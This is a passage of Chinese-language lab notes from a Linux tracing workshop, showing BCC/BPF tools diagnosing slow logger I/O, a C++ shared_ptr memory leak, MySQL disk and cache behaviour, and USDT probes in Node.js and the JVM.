        4096 -> 8191       : 1        |                                        |
        8192 -> 16383      : 5        |**                                      |

        usecs               : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 26       |**********                              |
        1024 -> 2047       : 102      |****************************************|
        2048 -> 4095       : 1        |                                        |
        4096 -> 8191       : 0        |                                        |
        8192 -> 16383      : 4        |*                                       |
    ^C
        usecs               : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 20       |********                                |
        1024 -> 2047       : 93       |****************************************|
        2048 -> 4095       : 8        |***                                     |
        4096 -> 8191       : 1        |                                        |
        8192 -> 16383      : 5        |**                                      |
    root@ubuntu1604:/usr/share/bcc/tools# 

从上面可以看到大部分的IO操作都很快，但是也有一些IO操作比较耗时。使用biosnoop看看，可以看到有一些logger的IO操作明显比较大。

    root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop 
    TIME(s)        COMM           PID    DISK    T  SECTOR    BYTES   LAT(ms)
000000000    logger         2120   vda     W  3230184   4096       1.49
001188000    jbd2/vda1-8    173    vda     W  1611120   8192       1.15
002201000    jbd2/vda1-8    173    vda     W  1611136   4096       0.90
023616000    logger         2120   vda     W  3230192   4096       1.22
024938000    jbd2/vda1-8    173    vda     W  1611144   8192       1.29
026173000    jbd2/vda1-8    173    vda     W  1611160   4096       1.13
047631000    logger         2120   vda     W  3230192   4096       1.23
048968000    jbd2/vda1-8    173    vda     W  1611168   8192       1.30
050024000    jbd2/vda1-8    173    vda     W  1611184   4096       0.95
071440000    logger         2120   vda     W  3230192   4096       1.20
072585000    jbd2/vda1-8    173    vda     W  1611192   8192       1.11
073800000    jbd2/vda1-8    173    vda     W  1611208   4096       1.09
090548000    logger         2121   vda     W  3217408   1048576    9.84
091801000    jbd2/vda1-8    173    vda     W  1611216   8192       1.16
093033000    jbd2/vda1-8    173    vda     W  1611232   4096       1.13

单独看看logger进程，可以发现logger偶尔会有很慢的IO操作：

    ^Croot@ubuntu1604:/usr/share/bcc/tools# ./biosnoop -p $(pidof logger)
    TIME(s)        COMM           PID    DISK    T  SECTOR    BYTES   LAT(ms)
000000000    logger         2120   vda     W  3235144   4096       1.15
001174000    jbd2/vda1-8    173    vda     W  1609744   8192       1.10
002295000    jbd2/vda1-8    173    vda     W  1609760   4096       1.01
023569000    logger         2120   vda     W  3235144   4096       1.06
024656000    jbd2/vda1-8    173    vda     W  1609768   8192       1.05
025822000    jbd2/vda1-8    173    vda     W  1609784   4096       1.07
037940000    logger         2121   vda     W  3217408   1048576    9.31
039198000    jbd2/vda1-8    173    vda     W  1609792   8192       1.16
040218000    jbd2/vda1-8    173    vda     W  1609808   4096       0.92

使用fileslower，可以看出来，logger延迟比较大的原因是写1M数据到log.data,超过了普通的1024字节。

    root@ubuntu1604:~/bcc/tools# ./fileslower.py 1
    Tracing sync read/writes slower than 1 ms
    TIME(s)  COMM           TID    D BYTES   LAT(ms) FILENAME
027    logger         1182   W 1024       3.79 log.data
055    logger         1182   W 1024       8.35 log.data
079    logger         1182   W 1024       3.62 log.data
103    logger         1182   W 1024       3.81 log.data
126    logger         1182   W 1024       3.71 log.data
150    logger         1182   W 1024       3.67 log.data
174    logger         1182   W 1024       3.68 log.data
198    logger         1182   W 1024       3.97 log.data
219    logger         1183   W 1048576   13.95 flush.data
222    logger         1182   W 1024       3.78 log.data
245    logger         1182   W 1024       3.54 log.data
269    logger         1182   W 1024       3.55 log.data
293    logger         1182   W 1024       3.76 log.data
317    logger         1182   W 1024       3.89 log.data
341    logger         1182   W 1024       3.85 log.data
364    logger         1182   W 1024       3.49 log.data
389    logger         1182   W 1024       4.96 log.data
413    logger         1182   W 1024       3.90 log.data
431    logger         1183   W 1048576   12.00 flush.data

5.Using BPF Tools: Chasing a Memory Leak

该实验中，用BPF的工具memleak检查一个程序的内存泄漏。

编译程序之后运行，输入文件名，统计，使用htop可以看到wordcount的内存使用一直在增加。

    g++ -fno-omit-frame-pointer -std=c++11 -g wordcount.cc -o wordcount

使用memleak可以是否有内存泄漏。

    root@ubuntu1604:/usr/share/bcc/tools/old# ./memleak -p $(pidof wordcount)

memleak默认每隔5s会打印出已经分配了，但是没有free掉的内存。

[18:15:21] Top 10 stacks with outstanding allocations: [18:15:36] Top 10 stacks with outstanding allocations: 34 bytes in 2 allocations from stack [unknown]

35 bytes in 2 allocations from stack
	 [unknown] 
	 [unknown] 
	
64 bytes in 2 allocations from stack
	 std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28 
	 std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&)+0x21 
	 std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<input_reader, std::allocator<input_reader>>(std::_Sp_make_shared_tag, input_reader*, std::allocator<input_reader> const&)+0x59 
	 std::__shared_ptr<input_reader, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x3c 
	 std::shared_ptr<input_reader>::shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x28 
	 std::shared_ptr<input_reader> std::allocate_shared<input_reader, std::allocator<input_reader>>(std::allocator<input_reader> const&)+0x37 
	 std::shared_ptr<input_reader> std::make_shared<input_reader>()+0x3b 
	 main+0x3b 
	 __libc_start_main+0xf0 
	
128 bytes in 2 allocations from stack
	 std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28 
	 std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&)+0x21 
	 std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, word_counter*, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x5f 
	 std::__shared_ptr<word_counter, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x50 
	 std::shared_ptr<word_counter>::shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x3c 
	 std::shared_ptr<word_counter> std::allocate_shared<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x4b 
	 _ZSt11make_sharedI12word_counterIRSt10shared_ptrI12input_readerEEES1_IT_EDpOT0_+0x51 
	 main+0x4e 
	 __libc_start_main+0xf0 
	
1767 bytes in 97 allocations from stack
	???
4194304 bytes in 1 allocations from stack
	 std::allocator_traits<std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::allocate(std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >&, unsigned long)+0x28 
	 std::_Vector_base<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_allocate(unsigned long)+0x2a 
	 void std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_emplace_back_aux<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x3e 
	 std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::push_back(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x69 
	 std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x26 
	 std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move<false, false, std::input_iterator_tag>::__copy_m<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x52 
	 std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x7d 
	 std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a2<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xb6 
	 std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::copy<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xa8 
	 word_counter::word_count[abi:cxx11]()+0xfc 

我们看到最大的一块没有释放的内存是在word_counter::word_count函数调用copy时候，还有一个是main中的std::shared_ptr指向word_counter的指针也没有释放。这就很奇怪了，因为shared_ptr会在对象退出scope时候自动析构。这个时候看代码：

    int main()
    {
            bool done = false;
            while (!done)
            {
                auto reader = std::make_shared<input_reader>();
                auto counter = std::make_shared<word_counter>(reader);
                reader->set_counter(counter);
                auto counts = counter->word_count();
                done = counter->done();
                for (auto const& wc : counts)
                {
                    std::cout << wc.first << " " << wc.second << '\n';
                }
            }
            return 0;
    }

原因就明了了，reader和counter发生了循环引用, 这样input_reader和word_counter的析构函数都是没有办法自动执行的。

6. Using BPF Tools: Database and Disk Stats and Stacks

在这个实验中将会使用BCC的tool去观察磁盘应能以及数据的query性能。

观察mysql的插入

首先安装, 启动 mysql：

    root@ubuntu1604:~/linux-tracing-workshop# apt install mysql-server
    root@ubuntu1604:~/linux-tracing-workshop# systemctl start mysql

创建好一个database之后运行：

    root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert

上述脚本会一直插入记录。

运行biotop会发现mysql一直比较忙：

    root@ubuntu1604:/usr/share/bcc/tools# ./biotop 
13:46 loadavg: 1.56 0.62 0.34 1/141 7738

    PID    COMM             D MAJ MIN DISK       I/O  Kbytes  AVGms
  jbd2/vda1-8      W 253 0   vda         30     180   1.15
 mysqld           W 253 0   vda         13      52   1.13
 mysqld           W 253 0   vda          1      16   4.84
 mysqld           W 253 0   vda          1      16   1.39

查看单个io的具体细节：

    root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop 
    TIME(s)        COMM           PID    DISK    T  SECTOR    BYTES   LAT(ms)
000000000    mysqld         7007   vda     W  11881528  4096       1.07
001324000    jbd2/vda1-8    173    vda     W  1594504   8192       1.29
003013000    jbd2/vda1-8    173    vda     W  1594520   4096       1.59
004724000    mysqld         7007   vda     W  11881528  4096       1.06
005880000    jbd2/vda1-8    173    vda     W  1594528   8192       1.12
007384000    jbd2/vda1-8    173    vda     W  1594544   4096       1.40
009750000    mysqld         7007   vda     W  11881528  4096       1.75
011242000    jbd2/vda1-8    173    vda     W  1594552   8192       1.46
012463000    jbd2/vda1-8    173    vda     W  1594568   4096       1.09
014872000    mysqld         7007   vda     W  11881528  4096       1.79
015912000    jbd2/vda1-8    173    vda     W  1594576   8192       1.01
017167000    jbd2/vda1-8    173    vda     W  1594592   4096       1.14
019677000    mysqld         7007   vda     W  11881528  4096       1.84
021173000    jbd2/vda1-8    173    vda     W  1594600   8192       1.46
022514000    jbd2/vda1-8    173    vda     W  1594616   4096       1.24
024218000    mysqld         7007   vda     W  11881528  4096       1.07
025966000    jbd2/vda1-8    173    vda     W  1594624   8192       1.72
027062000    jbd2/vda1-8    173    vda     W  1594640   4096       1.00
028742000    mysqld         7007   vda     W  11881528  4096       1.02
029930000    jbd2/vda1-8    173    vda     W  1594648   8192       1.15
031019000    jbd2/vda1-8    173    vda     W  1594664   4096       0.98
032752000    mysqld         7007   vda     W  11881528  4096       1.06
033856000    jbd2/vda1-8    173    vda     W  1594672   8192       1.07
035294000    jbd2/vda1-8    173    vda     W  1594688   4096       1.33

使用biolatency看看延迟分布：

    root@ubuntu1604:/usr/share/bcc/tools# ./biolatency  5
    Tracing block device I/O... Hit Ctrl-C to end.

        usecs               : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 748      |************                            |
        1024 -> 2047       : 2425     |****************************************|
        2048 -> 4095       : 74       |*                                       |
        4096 -> 8191       : 27       |                                        |
        8192 -> 16383      : 11       |                                        |
        16384 -> 32767      : 2        |                                        |
        32768 -> 65535      : 2        |                                        |

        usecs               : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 773      |*************                           |
        1024 -> 2047       : 2370     |****************************************|
        2048 -> 4095       : 78       |*                                       |
        4096 -> 8191       : 34       |                                        |
        8192 -> 16383      : 11       |                                        |
        16384 -> 32767      : 4        |                                        |
        32768 -> 65535      : 1        |                                        |

我们看到有一些IO延迟确实比较大，看一下提交给IO的内核栈（我的ubuntu 1604运行错误，可能跟内核编译选型有关）：

        stackcount -i 10 submit_bio

使用fileslower查看比较慢的操作：

    root@ubuntu1604:/usr/share/bcc/tools# ./fileslower  1
    Tracing sync read/writes slower than 1 ms
    TIME(s)  COMM           TID    D BYTES   LAT(ms) FILENAME
901    rs:main Q:Reg  459    W 92         1.80 auth.log
479    mysqld         7007   W 1024       1.48 ib_logfile0
952    mysqld         7007   W 512        2.72 ib_logfile0
828   mysqld         7007   W 512        5.28 ib_logfile0
843   mysqld         7007   W 8704       2.41 ib_logfile0
573   mysqld         7007   W 512        2.84 ib_logfile0
177   mysqld         7007   W 512        2.98 ib_logfile0
049   mysqld         7007   W 512        1.32 ib_logfile0
975   mysqld         7007   W 512        2.69 ib_logfile0
992   mysqld         7007   W 512        5.47 ib_logfile0
595   mysqld         7007   W 512        1.29 ib_logfile0

使用filetop查看mysql在插入row时候的文件访问

    ^Croot@ubuntu1604:/usr/share/bcc/tools# ./filetop 
    Tracing... Output every 1 secs. Hit Ctrl-C to end
27:08 loadavg: 1.78 1.61 1.12 1/139 7844

    TID    COMM             READS  WRITES R_Kb    W_Kb    T FILE
 clear            2      0      8       0       R xterm
 filetop          2      0      2       0       R loadavg
 clear            1      0      0       0       R libtinfo.so.5.9
 clear            1      0      0       0       R libc-2.23.so
 filetop          3      0      0       0       R clear
 filetop          2      0      0       0       R ld-2.23.so
 filetop          1      0      0       0       R id
 mysqld           0      1      0       16      R employees.ibd
 mysqld           0      239    0       166     R ib_logfile0
27:09 loadavg: 1.78 1.61 1.12 1/139 7845

    TID    COMM             READS  WRITES R_Kb    W_Kb    T FILE
 clear            2      0      8       0       R xterm
 filetop          2      0      2       0       R loadavg
 clear            1      0      0       0       R libtinfo.so.5.9
 clear            1      0      0       0       R libc-2.23.so
 filetop          3      0      0       0       R clear
 filetop          2      0      0       0       R ld-2.23.so
 mysqld           0      1      0       16      R employees.ibd
 mysqld           0      243    0       168     R ib_logfile0

查看IO操作的中断对系统的影响：

    root@ubuntu1604:/usr/share/bcc/tools# ./hardirqs 1
    Tracing hard irq event time... Hit Ctrl-C to end.

    HARDIRQ                    TOTAL_usecs
    virtio1-input.0                    161
    virtio3-req.0                     5684

    HARDIRQ                    TOTAL_usecs
    virtio0-input.0                      2
    virtio1-input.0                    108
    virtio3-req.0                     5639

    HARDIRQ                    TOTAL_usecs
    virtio1-input.0                    145
    virtio3-req.0                     5678

    HARDIRQ                    TOTAL_usecs
    virtio0-input.0                      1
    virtio1-input.0                    134
    virtio3-req.0                     5891

    HARDIRQ                    TOTAL_usecs
    virtio1-input.0                    116
    virtio3-req.0                     5869

现在观察mysql的查询

插入数据并select:

    root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert_once
    Inserting employees...
    root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py select
    Selecting employees...

使用biotop，biolatency, fileslower均没有看到有慢的IO操作，猜测是cache命中得比较好。

运行cachestat之后运行select:

    root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
        HITS   MISSES  DIRTIES  READ_HIT% WRITE_HIT%   BUFFERS_MB  CACHED_MB
        0        0        0       0.0%       0.0%           64       1531
        0        0        0       0.0%       0.0%           64       1531
        0        0        0       0.0%       0.0%           64       1531
        1124        0        0     100.0%       0.0%           64       1531
        5        2        3      28.6%       0.0%           64       1531
        0        0        0       0.0%       0.0%           64       1531
        0        0        0       0.0%       0.0%           64       1531
        0        0        0       0.0%       0.0%           64       1531
        0        0        0       0.0%       0.0%           64       1531

可以看到在某一段时间有读操作，但是之后就没有，可以猜想mysql在内部实现了自己的cache。

关闭系统cache，可以看到确实也没有发生很多read操作。

    root@ubuntu1604:/usr/share/bcc/tools# echo 1 > /proc/sys/vm/drop_caches
    root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
        HITS   MISSES  DIRTIES  READ_HIT% WRITE_HIT%   BUFFERS_MB  CACHED_MB
        0        0        0       0.0%       0.0%            0         88
        4        0        0     100.0%       0.0%            0         88
        6        5        4      18.2%      18.2%            0         88
        0        0        0       0.0%       0.0%            0         88
        0        0        0       0.0%       0.0%            0         88
        3        0        0     100.0%       0.0%            0         88
        0        0        0       0.0%       0.0%            0         88
        0        0        0       0.0%       0.0%            0         88
        0        0        0       0.0%       0.0%            0         88

7. Using BPF Tools: Node and JVM USDT Probes

Node

编译支持USDT的node, 之前要先按照systemtap-sdt-dev:

    $ git clone https://github.com/nodejs/node.git
    $ cd node
    $ git checkout v6.2.1   # or whatever version is currently stable
    $ ./configure --prefix=/opt/node --with-dtrace
    $ make -j 3
    $ sudo make install

使用tplist显示node的USDT probe点：

    root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node
    /root/node/node node:gc__start
    /root/node/node node:gc__done
    /root/node/node node:net__server__connection
    /root/node/node node:net__stream__end
    /root/node/node node:http__server__response
    /root/node/node node:http__client__response
    /root/node/node node:http__client__request
    /root/node/node node:http__server__request

将node运行起来可以查看更多的USDT probe:

    root@ubuntu1604:/usr/share/bcc/tools# ./tplist -p $(pidof node)
    /lib/x86_64-linux-gnu/libc-2.23.so libc:setjmp
    /lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp
    /lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp_target
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_new
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_free_list
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_sbrk_less
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_wait
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_new
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_retry
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_free
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_less
    /lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_more

查看probe的详细信息：

    root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node -vv '*server__request'
    /root/node/node node:http__server__request [sema 0x1c0a034]
    location #1 0x1045cf8
        argument #1 8 unsigned bytes @ r14
        argument #2 8 unsigned bytes @ ax
        argument #3 8 unsigned bytes @ *(bp - 4344)
        argument #4 4 signed   bytes @ *(bp - 4348)
        argument #5 8 unsigned bytes @ *(bp - 4304)
        argument #6 8 unsigned bytes @ *(bp - 4312)
        argument #7 4 signed   bytes @ *(bp - 4352)

在node/src/node.stp文件中有每个参数的含义：

    probe node_http_server_request = process("node").mark("http__server__request")
    {
    remote = user_string($arg3);
    port = $arg4;
    method = user_string($arg5);
    url = user_string($arg6);
    fd = $arg7;

    probestr = sprintf("%s(remote=%s, port=%d, method=%s, url=%s, fd=%d)",
        $$name,
        remote,
        port,
        method,
        url,
        fd);
    }

开启server.js:

    root@ubuntu1604:~/linux-tracing-workshop# ~/node/node  server.js

另一个终端开启trace:

    root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'

另一个终端发送请求，arg5分别表示method和url：

    root@ubuntu1604:~/node/src# curl localhost:8080
    Hello, world!root@ubuntu1604:~/node/src# curl localhost:8080/index.html
    Hello, world!root@ubuntu1604:~/node/src# curl 'localhost:8080/login?user=dave&pwd=123'
    Hello, world!root@ubuntu1604:~/node/src# 

从第二个终端可以看到输出：

    root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
    PID    TID    COMM         FUNC             -
    25022  25022  node         http__server__request GET /
    25022  25022  node         http__server__request GET /index.html
    25022  25022  node         http__server__request GET /login?user=dave&pwd=123

JVM

下载tapset

查看USDT probe:

    root@ubuntu1604:~/systemtap-tapset-openjdk9# ./create-tapset.sh /usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/
    root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*class_loaded' *.stp
    hotspot-1.9.0.stp:probe hotspot.class_loaded =
    hotspot-1.9.0.stp-  process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded"),
    hotspot-1.9.0.stp-  process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded")
    hotspot-1.9.0.stp-{
    hotspot-1.9.0.stp-  name = "class_loaded";
    hotspot-1.9.0.stp-  class = user_string_n($arg1, $arg2);
    hotspot-1.9.0.stp-  classloader_id = $arg3;
    hotspot-1.9.0.stp-  is_shared = $arg4;
    hotspot-1.9.0.stp-  probestr = sprintf("%s(class='%s',classloader_id=0x%x,is_shared=%d)",
    hotspot-1.9.0.stp-                     name, class, classloader_id, is_shared);
    hotspot-1.9.0.stp-}

启动slowy/App

    root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java slowy/App

查看进程probe点：

    root@ubuntu1604:~/bcc/tools# /usr/lib/jvm/java-9-openjdk-amd64/bin/jps
    33757 sun.tools.jps.Jps
    33727 App
    root@ubuntu1604:~/bcc/tools# ./tplist.py -p 33727 '*class*loaded'
    /usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__loaded
    /usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__unloaded
    root@ubuntu1604:~/bcc/tools# 

开始跟踪：

    root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'

关闭slowy/App, 可以看到trace到了加载的类

    root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
    PID    TID    COMM         FUNC             -
    33727  33728  java         class__loaded    java/lang/Shutdown 
    33727  33728  java         class__loaded    java/lang/Shutdown$Lock        

接下来trace一下参数：

    root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_entry' *.stp
    hotspot-1.9.0.stp:probe hotspot.method_entry =
    hotspot-1.9.0.stp-  process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry"),
    hotspot-1.9.0.stp-  process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry")
    hotspot-1.9.0.stp-{
    hotspot-1.9.0.stp-  name = "method_entry";
    hotspot-1.9.0.stp-  thread_id = $arg1;
    hotspot-1.9.0.stp-  class = user_string_n($arg2, $arg3);
    hotspot-1.9.0.stp-  method = user_string_n($arg4, $arg5);
    hotspot-1.9.0.stp-  sig = user_string_n($arg6, $arg7);
    hotspot-1.9.0.stp-  probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
    hotspot-1.9.0.stp-                     name, thread_id, class, method, sig);
    root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_return' *.stp
    hotspot-1.9.0.stp:probe hotspot.method_return =
    hotspot-1.9.0.stp-  process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return"),
    hotspot-1.9.0.stp-  process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return")
